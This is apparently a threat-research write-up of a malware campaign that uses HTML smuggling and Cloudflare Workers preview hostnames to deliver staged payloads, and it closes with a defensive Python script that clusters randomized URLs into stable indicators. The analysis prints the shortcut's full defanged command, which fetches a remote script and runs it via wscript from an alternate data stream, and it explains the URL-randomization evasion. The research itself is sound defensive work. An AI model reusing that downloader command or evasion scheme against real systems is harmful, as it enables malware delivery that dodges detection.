To generate the second stage of the attack, the JSON fetched from the URL is parsed, its Base64 payload is decoded into an ArrayBuffer and written to the browser's blob storage, the blob is renamed to match the name of the HTML file, and a link to it is created and auto-clicked so that the user's browser downloads it.

What the download looks like in Chrome.

Second stage:

The second stage starts with a zip file that was just assembled from the data in the URL. This method of file creation has a few advantages over simply serving a static zip file for download.

1. The threat actor can create different files for different targets and serve them all from one endpoint.

2. Network controls might block the download of file objects, but JSON is a natural part of the web and would never be blocked.

3. Some security solution vendors can identify file objects in network traffic and send them for analysis. This would jeopardize the operation fairly fast, and IOCs could be distributed across the world in no time.

The zipped file contains a shortcut with a modified target and icon.

Totally legitimate-looking shortcut!

%ComSpec% /c "echo GetObject("script:hxxps://xsw%RANDOM%nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev/?09/")" > %temp%\Lqncxmm:vbvvjjh.js && start wscript.exe %temp%\Lqncxmm:vbvvjjh.js"

Let’s dissect.

While it is less commonly known or used, %ComSpec% is a pre-assigned environment variable that, by default, stores the absolute path of cmd.exe and dates back to the stone ages.

Next, we have the GetObject VBA function with a link to a WScript file to download and run from the temp folder. But pay attention to the URL again: there is a %RANDOM% variable in it. %RANDOM% is a built-in variable of the Windows CMD shell that returns a random integer from 0 to 32,767. Because the URL is wrapped in an echo command, the variable is expanded to a concrete number before the GetObject command is written out and passed to CMD for execution. This yields an almost unlimited number of URLs, one for each value the random variable returns. To understand how this works, we need to understand how Cloudflare Workers work.

By everyone, they mean threat actors as well.

Cloudflare Workers derive their name from Web Workers, and more specifically Service Workers, the W3C standard API for scripts that run in the background in a web browser and intercept HTTP requests. Cloudflare Workers are written against the same standard API but run on Cloudflare’s servers, not in a browser. Cloudflare Workers lets you run JavaScript in Cloudflare’s hundreds of data centers around the world. Using a Worker, one can do a number of things, including:

Load balance between multiple origins to improve speed or reliability.

Render HTML templates while fetching dynamic content from your origin.

Dynamically respond to requests without needing to connect to an origin server at all.

Generate parallel requests to different services and combine the responses.

Create custom security rules and filters to block unwanted visitors and bots.

Perform data sanitation and validation before sending a request to origin.

Actions happen inside Cloudflare’s lightning-fast edge network.

All in all, Cloudflare Workers offers threat actors a highly resilient platform without the need to maintain infrastructure of their own. Cloudflare Workers has a free plan that anyone or anything can sign up for and get 100,000 total requests per day, and you can create an unlimited number of Workers per account.

But you might still be asking how the URL with a random number in its subdomain was created.

The Cloudflare Workers dashboard has a script editor feature that gives developers the option to write and preview a script before deploying it to the network; think of it as something like jsfiddle.net. The preview renders the script on a different hostname every time the script is run, except that the hostname is not a real one: it is a virtual one created from the incoming request and the name given to the Worker.

Let me show you an example:

Here I have a free Worker running a simple script that just returns "Hello World" as the page content. There is a preview panel on the side that displays the changes I make when I press Run.

Workers Script Editor

This is the general flow that Cloudflare Script editor uses to preview the changes:

The preview panel is not served from the Worker's ID address. If you open Chrome's network panel, you will see the response coming from a different hostname every time.

First run.

The first run involves making a GET request to

https://84efc29573641d2f04337907900ab249.cloudflareworkers.com/.edgeworker-fiddle-init-preview/ae634c73683563b82196ddb468eede951636ba7051b2f5171ba2ae69ae94b17b1muddy-surf-5e18.marcel.workers.dev/

which, after setting a cookie, redirects to

https://84efc29573641d2f04337907900ab249.cloudflareworkers.com

Second run.

Like the first run, the second run is making a GET request to

https://327559932d6dbe26a9d576034fd615d2.cloudflareworkers.com/.edgeworker-fiddle-init-preview/ae634c73683563b82196ddb468eede951636ba7051b2f5171ba2ae69ae94b17b1muddy-surf-5e18.marcel.workers.dev/

which redirects to

https://327559932d6dbe26a9d576034fd615d2.cloudflareworkers.com

Now if I make an arbitrary change to the Worker name portion of the first GET request URL, the response is still the same. Here I replaced the first 5 digits with 12345, and the redirect target shows the same content.

voila!

Potentially this can produce a large or unlimited number of hostnames that execute a particular piece of code, which traditional anti-bot or blocking tools will fail to catch. Cloudflare Workers cannot host files, but a Worker can redirect traffic to a static file hosting server without revealing that server's identity. The Cloudflare documentation even provides an example:

Remember the shortcut? If you replace %RANDOM% with any digits or letters, you end up with a preview URL that drops the script file.

hxxps://xsw12345nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev

Third Stage:

The script file is saved to %temp%\Lqncxmm:vbvvjjh.js and executed by the Windows Script Host (wscript.exe) process. You can see how the threat actor turns this Cloudflare feature to their advantage: the authors added a simple random number generator and effectively randomize the URL that downloads the third-stage payload.

such a simple function

The simple function above generates a random number based on the parameter given to it. For the third stage there are ten randomized, unique Cloudflare Worker node links, and each link uses a random number between 20000 and 50000 twice. So just one link would have 900 million variations. I'll let you do the calculation on how many traditional IOCs you would obtain from just a simple script.
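An added example (not code from the article or from the campaign) of how a defender can collapse the randomized preview hostnames described above, both for the shortcut's %RANDOM% trick and for the third-stage links, into one stable indicator: the parsing assumes the preview path shape shown on this page, and every sample URL except the article's own defanged one is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

PREVIEW_HOST_SUFFIX = ".cloudflareworkers.com"
PREVIEW_PREFIX = "/.edgeworker-fiddle-init-preview/"

# Preview path segment copied from the article's shortcut; the leading hex part
# is generated by the editor, the tail names the script and the workers.dev account.
SEGMENT = ("6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371"
           "proud-glade-92ec.ativadormasterplus.workers.dev")

# Constructed sample: the article's defanged URL, two variants with other %RANDOM%
# values, one unrelated cloudflareworkers.com URL and one non-Cloudflare URL.
SAMPLE_URLS = [
    "hxxps://xsw12345nnccccmd95c22[.]cloudflareworkers[.]com" + PREVIEW_PREFIX + SEGMENT + "/?09/",
    "https://xsw7nnccccmd95c22.cloudflareworkers.com" + PREVIEW_PREFIX + SEGMENT + "/?09/",
    "https://xsw31337nnccccmd95c22.cloudflareworkers.com" + PREVIEW_PREFIX + SEGMENT + "/",
    "https://84efc29573641d2f04337907900ab249.cloudflareworkers.com/",
    "https://example.com/.edgeworker-fiddle-init-preview/x.y.workers.dev/",
]

def refang(url: str) -> str:
    """Undo common defanging (hxxp, [.]) so the URL can be parsed."""
    return re.sub(r"^hxxp", "http", url.strip().replace("[.]", "."), flags=re.IGNORECASE)

def preview_indicator(url: str):
    """Return (workers.dev account label, full preview path segment) for a Workers
    preview-fiddle URL, or None. Neither value depends on the random hostname."""
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower()
    if not host.endswith(PREVIEW_HOST_SUFFIX) or not parts.path.startswith(PREVIEW_PREFIX):
        return None
    segment = parts.path[len(PREVIEW_PREFIX):].split("/", 1)[0]
    labels = segment.split(".")
    # Expected shape: <hex><script-name>.<account>.workers.dev
    if len(labels) < 4 or labels[-2:] != ["workers", "dev"]:
        return None
    return labels[-3], segment

def cluster_by_indicator(urls):
    """Group observed URLs by stable indicator; the random hostnames collapse
    into one entry, which is the IOC worth distributing."""
    groups = defaultdict(set)
    for url in urls:
        indicator = preview_indicator(url)
        if indicator is not None:
            groups[indicator].add((urlsplit(refang(url)).hostname or "").lower())
    return {key: sorted(hosts) for key, hosts in groups.items()}
```

Running `cluster_by_indicator(SAMPLE_URLS)` yields a single key for the ativadormasterplus account with three hostnames under it, while the two non-preview URLs are ignored.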